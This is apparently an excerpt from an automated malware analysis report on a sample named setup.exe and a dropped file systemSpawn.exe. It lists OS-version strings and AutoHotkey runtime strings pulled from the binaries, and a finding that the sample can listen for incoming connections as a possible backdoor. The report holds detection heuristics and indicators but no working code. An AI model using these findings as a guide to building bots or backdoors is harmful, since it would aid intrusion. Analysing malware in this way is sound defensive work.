OS version to string mapping found (often used in BOTs)

Source: setup.exe	Binary or memory string: WIN_XP
Source: setup.exe	Binary or memory string: WIN_VISTA
Source: setup.exe	Binary or memory string: WIN_7
Source: setup.exe	Binary or memory string: WIN_8
Source: systemSpawn.exe.6.dr	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle1.1.24.01\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003WIN_2000%04hXcomspecGetCursorInfo0x%IxpPIntStrPtrShortCharInt64DoubleAStrWStrgdi32comctl32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity. The program is now unstable and will exit.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCcFfSelectVisCenterUniDescCaseLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameWpsapiH
Source: setup.exe	Binary or memory string: WIN_8.1

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)